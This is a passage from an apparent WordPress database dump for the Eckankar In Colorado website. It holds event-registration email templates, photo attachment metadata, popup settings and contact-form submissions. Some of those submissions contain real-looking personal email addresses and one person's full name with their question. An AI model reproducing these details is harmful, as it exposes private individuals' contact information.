top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px;\">Admin Notification</span></div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div style=\"text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n<div style=\"text-align: center;\"><br />\r\n<span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span>\r\n<p> <span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></p>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(25494,152442,'_wp_attached_file','2019/09/harold-eck-masters-page-frame-1.jpg'),(25495,152442,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:209;s:6:\"height\";i:259;s:4:\"file\";s:43:\"2019/09/harold-eck-masters-page-frame-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"harold-eck-masters-page-frame-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:43:\"harold-eck-masters-page-frame-1-209x250.jpg\";s:5:\"width\";i:209;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:41:\"harold-eck-masters-page-frame-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:43:\"harold-eck-masters-page-frame-1-145x180.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:43:\"harold-eck-masters-page-frame-1-209x150.jpg\";s:5:\"width\";i:209;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25603,128298,'_EventOriginalParent','128250'),(25732,160151,'_menu_item_type','post_type'),(25733,160151,'_menu_item_menu_item_parent','0'),(25734,160151,'_menu_item_object_id','151053'),(25735,160151,'_menu_item_object','page'),(25736,160151,'_menu_item_target',''),(25737,160151,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(25738,160151,'_menu_item_xfn',''),(25739,160151,'_menu_item_url',''),(25745,161672,'data_version','3'),(25746,161672,'popup_open_count','106'),(25747,161672,'_edit_lock','1617132466:2'),(25748,161672,'_edit_last','2'),(25749,161672,'boldgrid_hide_page_title','0'),(25750,161672,'popup_title',''),(25751,161672,'popup_settings','a:44:{s:8:\"theme_id\";s:6:\"132185\";s:4:\"size\";s:5:\"small\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:10:\"center top\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:10:\"conditions\";a:0:{}s:8:\"triggers\";a:0:{}s:7:\"cookies\";a:0:{}s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"separator1\";N;s:13:\"atc_promotion\";N;s:7:\"explain\";N;s:12:\"type_section\";N;s:12:\"fi_promotion\";N;s:10:\"theme_slug\";s:15:\"enterprise-blue\";}'),(25752,161672,'popup_open_count_total','106'),(25753,161672,'popup_last_opened','1617109869'),(25754,162680,'_field_302','Test 1'),(25755,162680,'_field_303','testing1'),(25756,162680,'_field_304','choll.03@comcast.net'),(25757,162680,'_field_306','This Test'),(25758,162680,'_field_307','Youth and Fam test message.'),(25759,162680,'_form_id','34'),(25760,162680,'_seq_num','1'),(25761,162773,'_field_302','Test 2'),(25762,162773,'_field_303','Testing--2'),(25763,162773,'_field_304','choll.03@comcast.net'),(25764,162773,'_field_306','TEST--2'),(25765,162773,'_field_307','TEST 2 OF THE Y &amp; F FORM'),(25766,162773,'_form_id','34'),(25767,162773,'_seq_num','2'),(25768,162774,'_field_302','Test 3'),(25769,162774,'_field_303','Testing---3'),(25770,162774,'_field_304','choll.03@comcast.net'),(25771,162774,'_field_306','Youth and Fam Test ----3'),(25772,162774,'_field_307','Youth and Fam test -------3 '),(25773,162774,'_form_id','34'),(25774,162774,'_seq_num','3'),(25775,162775,'_field_302','Test-4'),(25776,162775,'_field_303','Testing---4'),(25777,162775,'_field_304','choll.03@comcast.net'),(25778,162775,'_field_306','TEST___4'),(25779,162775,'_field_307','YOUTH AND FAMILY -----    TEST 4'),(25780,162775,'_form_id','34'),(25781,162775,'_seq_num','4'),(25782,162776,'_field_302','TEST---5'),(25783,162776,'_field_303','Testing---5'),(25784,162776,'_field_304','choll.03@comcast.net'),(25785,162776,'_field_306','TESTING--------------5'),(25786,162776,'_field_307','Youth and family testing 5.....................'),(25787,162776,'_form_id','34'),(25788,162776,'_seq_num','5'),(25789,162777,'_field_302','TEST----6'),(25790,162777,'_field_303','TESTING------6'),(25791,162777,'_field_304','choll.03@comcast.net'),(25792,162777,'_field_306','TEST....6'),(25793,162777,'_field_307','YOUTH AND FAM TEST NUMBER 6. WILL IT EVER END?'),(25794,162777,'_form_id','34'),(25795,162777,'_seq_num','6'),(25796,163130,'_field_302','Pat'),(25797,163130,'_field_303','Lafferty'),(25798,163130,'_field_304','johnpat1999@centurylink.net'),(25799,163130,'_field_306','Your location'),(25800,163130,'_field_307','Where is the Colorado Eck Temple?'),(25801,163130,'_form_id','34'),(25802,163130,'_seq_num','7'),(25809,165248,'_wp_attached_file','2019/09/ECK_Temple_CO_031-lg.jpg'),(25810,165248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:596;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_031-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_031-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-250x194.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-550x427.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-232x180.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-386x300.jpg\";s:5:\"width\";i:386;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_031-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442750761\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25811,165249,'_wp_attached_file','2019/09/ECK_Temple_CO_032-lg.jpg'),(25812,165249,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_032-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_032-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_032-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442662287\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.94\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25813,165250,'_wp_attached_file','2019/09/ECK_Temple_CO_033-lg.jpg'),(25814,165250,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1039;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_033-lg.jpg\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-300x134.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-768x342.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"ECK_Temple_CO_033-lg-1024x456.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:456;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_033-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-250x111.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-550x245.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-800x356.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:356;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-404x180.jpg\";s:5:\"width\";i:404;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-673x300.jpg\";s:5:\"width\";i:673;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_033-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442661806\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:18:\"0.0072463768115942\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25815,165251,'_wp_attached_file','2019/09/ECK_Temple_CO_034-lg.jpg'),(25816,165251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_034-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_034-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_034-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442753469\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25817,165252,'_wp_attached_file','2019/09/ECK_Temple_CO_035-lg.jpg'),(25818,165252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:309;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_035-lg.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-309x250.jpg\";s:5:\"width\";i:309;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_035-lg